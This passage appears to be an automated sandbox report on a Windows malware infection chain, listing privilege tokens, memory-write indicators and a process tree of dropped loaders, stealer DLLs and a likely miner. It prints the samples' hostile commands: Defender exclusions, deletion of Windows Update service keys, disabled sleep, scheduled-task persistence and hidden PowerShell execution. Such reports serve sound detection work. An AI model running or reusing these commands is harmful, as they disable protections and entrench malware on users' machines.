Acslq.exe Token: SeDebugPrivilege 3548 powershell.exe Token: SeShutdownPrivilege 8168 powercfg.exe Token: SeCreatePagefilePrivilege 8168 powercfg.exe Token: SeDebugPrivilege 8044 powershell.exe Token: SeShutdownPrivilege 4152 sc.exe Token: SeCreatePagefilePrivilege 4152 sc.exe Token: SeShutdownPrivilege 8148 powercfg.exe Token: SeCreatePagefilePrivilege 8148 powercfg.exe Token: SeShutdownPrivilege 1996 powercfg.exe Token: SeCreatePagefilePrivilege 1996 powercfg.exe Token: SeIncreaseQuotaPrivilege 8044 powershell.exe Token: SeSecurityPrivilege 8044 powershell.exe Token: SeTakeOwnershipPrivilege 8044 powershell.exe Token: SeLoadDriverPrivilege 8044 powershell.exe Token: SeSystemProfilePrivilege 8044 powershell.exe Token: SeSystemtimePrivilege 8044 powershell.exe Token: SeProfSingleProcessPrivilege 8044 powershell.exe Token: SeIncBasePriorityPrivilege 8044 powershell.exe Token: SeCreatePagefilePrivilege 8044 powershell.exe Token: SeBackupPrivilege 8044 powershell.exe Token: SeRestorePrivilege 8044 powershell.exe Token: SeShutdownPrivilege 8044 powershell.exe Token: SeDebugPrivilege 8044 powershell.exe Token: SeSystemEnvironmentPrivilege 8044 powershell.exe Token: SeRemoteShutdownPrivilege 8044 powershell.exe Token: SeUndockPrivilege 8044 powershell.exe Token: SeManageVolumePrivilege 8044 powershell.exe Token: 33 8044 powershell.exe Token: 34 8044 powershell.exe Token: 35 8044 powershell.exe Token: 36 8044 powershell.exe Token: SeIncreaseQuotaPrivilege 8044 powershell.exe Token: SeSecurityPrivilege 8044 powershell.exe Token: SeTakeOwnershipPrivilege 8044 powershell.exe Token: SeLoadDriverPrivilege 8044 powershell.exe Token: SeSystemProfilePrivilege 8044 powershell.exe Token: SeSystemtimePrivilege 8044 powershell.exe Token: SeProfSingleProcessPrivilege 8044 powershell.exe Token: SeIncBasePriorityPrivilege 8044 powershell.exe Token: SeCreatePagefilePrivilege 8044 powershell.exe Token: SeBackupPrivilege 8044 powershell.exe Token: SeRestorePrivilege 8044 powershell.exe Token: SeShutdownPrivilege 8044 powershell.exe Token: SeDebugPrivilege 8044 powershell.exe Token: SeSystemEnvironmentPrivilege 8044 powershell.exe Token: SeRemoteShutdownPrivilege 8044 powershell.exe Token: SeUndockPrivilege 8044 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tmp.exenbveek.execmd.exelebro.exenbveek.execmd.exedescription pid process target process PID 4920 wrote to memory of 408 4920 tmp.exe nbveek.exe PID 4920 wrote to memory of 408 4920 tmp.exe nbveek.exe PID 4920 wrote to memory of 408 4920 tmp.exe nbveek.exe PID 408 wrote to memory of 1404 408 nbveek.exe schtasks.exe PID 408 wrote to memory of 1404 408 nbveek.exe schtasks.exe PID 408 wrote to memory of 1404 408 nbveek.exe schtasks.exe PID 408 wrote to memory of 4520 408 nbveek.exe cmd.exe PID 408 wrote to memory of 4520 408 nbveek.exe cmd.exe PID 408 wrote to memory of 4520 408 nbveek.exe cmd.exe PID 4520 wrote to memory of 740 4520 cmd.exe cmd.exe PID 4520 wrote to memory of 740 4520 cmd.exe cmd.exe PID 4520 wrote to memory of 740 4520 cmd.exe cmd.exe PID 4520 wrote to memory of 4708 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 4708 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 4708 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 4964 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 4964 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 4964 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 2764 4520 cmd.exe cmd.exe PID 4520 wrote to memory of 2764 4520 cmd.exe cmd.exe PID 4520 wrote to memory of 2764 4520 cmd.exe cmd.exe PID 4520 wrote to memory of 2576 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 2576 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 2576 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 2408 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 2408 4520 cmd.exe cacls.exe PID 4520 wrote to memory of 2408 4520 cmd.exe cacls.exe PID 408 wrote to memory of 2844 408 nbveek.exe loda.exe PID 408 wrote to memory of 2844 408 nbveek.exe loda.exe PID 408 wrote to memory of 4948 408 nbveek.exe desto1.exe PID 408 wrote to memory of 4948 408 nbveek.exe desto1.exe PID 408 wrote to memory of 4948 408 nbveek.exe desto1.exe PID 408 wrote to memory of 4172 408 nbveek.exe fermo1.exe PID 408 wrote to memory of 4172 408 nbveek.exe fermo1.exe PID 408 wrote to memory of 4172 408 nbveek.exe fermo1.exe PID 408 wrote to memory of 1944 408 nbveek.exe varka1.exe PID 408 wrote to memory of 1944 408 nbveek.exe varka1.exe PID 408 wrote to memory of 1944 408 nbveek.exe varka1.exe PID 408 wrote to memory of 3696 408 nbveek.exe love.exe PID 408 wrote to memory of 3696 408 nbveek.exe love.exe PID 408 wrote to memory of 3696 408 nbveek.exe love.exe PID 408 wrote to memory of 3848 408 nbveek.exe love1.exe PID 408 wrote to memory of 3848 408 nbveek.exe love1.exe PID 408 wrote to memory of 3848 408 nbveek.exe love1.exe PID 408 wrote to memory of 4556 408 nbveek.exe fermo.exe PID 408 wrote to memory of 4556 408 nbveek.exe fermo.exe PID 408 wrote to memory of 4556 408 nbveek.exe fermo.exe PID 408 wrote to memory of 3624 408 nbveek.exe desto.exe PID 408 wrote to memory of 3624 408 nbveek.exe desto.exe PID 408 wrote to memory of 3624 408 nbveek.exe desto.exe PID 408 wrote to memory of 1580 408 nbveek.exe lebro.exe PID 408 wrote to memory of 1580 408 nbveek.exe lebro.exe PID 408 wrote to memory of 1580 408 nbveek.exe lebro.exe PID 1580 wrote to memory of 4332 1580 lebro.exe nbveek.exe PID 1580 wrote to memory of 4332 1580 lebro.exe nbveek.exe PID 1580 wrote to memory of 4332 1580 lebro.exe nbveek.exe PID 4332 wrote to memory of 1464 4332 nbveek.exe schtasks.exe PID 4332 wrote to memory of 1464 4332 nbveek.exe schtasks.exe PID 4332 wrote to memory of 1464 4332 nbveek.exe schtasks.exe PID 4332 wrote to memory of 4024 4332 nbveek.exe cmd.exe PID 4332 wrote to memory of 4024 4332 nbveek.exe cmd.exe PID 4332 wrote to memory of 4024 4332 nbveek.exe cmd.exe PID 4024 wrote to memory of 1800 4024 cmd.exe cmd.exe PID 4024 wrote to memory of 1800 4024 cmd.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:R" /E5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000049001\loda.exe"C:\Users\Admin\AppData\Local\Temp\1000049001\loda.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000050001\desto1.exe"C:\Users\Admin\AppData\Local\Temp\1000050001\desto1.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 9485⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000051051\fermo1.exe"C:\Users\Admin\AppData\Local\Temp\1000051051\fermo1.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000052051\varka1.exe"C:\Users\Admin\AppData\Local\Temp\1000052051\varka1.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 12365⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000053001\love.exe"C:\Users\Admin\AppData\Local\Temp\1000053001\love.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1000054000\love1.exe"C:\Users\Admin\AppData\Roaming\1000054000\love1.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000055051\fermo.exe"C:\Users\Admin\AppData\Local\Temp\1000055051\fermo.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000056001\desto.exe"C:\Users\Admin\AppData\Local\Temp\1000056001\desto.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 9525⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000057001\lebro.exe"C:\Users\Admin\AppData\Local\Temp\1000057001\lebro.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\9e0894bcc4" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\9e0894bcc4" /P "Admin:R" /E7⤵
-
C:\Users\Admin\AppData\Local\Temp\1000043001\OwvtknErB0Wl.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\OwvtknErB0Wl.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"7⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 12807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 12887⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000051001\Player31.exe"C:\Users\Admin\AppData\Local\Temp\1000051001\Player31.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E9⤵
-
C:\Users\Admin\AppData\Local\Temp\1000069001\pb1111.exe"C:\Users\Admin\AppData\Local\Temp\1000069001\pb1111.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000070001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000070001\random.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\1000070001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000070001\random.exe" -h9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000072001\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\1000072001\XandETC.exe"8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main8⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main9⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4840 -s 68010⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000056001\nonetrollplease.exe"C:\Users\Admin\AppData\Local\Temp\1000056001\nonetrollplease.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 5967⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000065001\Acslq.exe"C:\Users\Admin\AppData\Local\Temp\1000065001\Acslq.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000065001\Acslq.exeC:\Users\Admin\AppData\Local\Temp\1000065001\Acslq.exe7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 17568⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000068001\jn-17L.exe"C:\Users\Admin\AppData\Local\Temp\1000068001\jn-17L.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -windowstyle hidden -file "C:\Users\Admin\AppData\Local\Temp\guieojq7j3lwcud2635ks1t0gkfea0s1.ps1"7⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000073001\buildee.exe"C:\Users\Admin\AppData\Local\Temp\1000073001\buildee.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main6⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main7⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2152 -s 6808⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main4⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main5⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1620 -s 6806⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main4⤵
- Loads dropped DLL
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
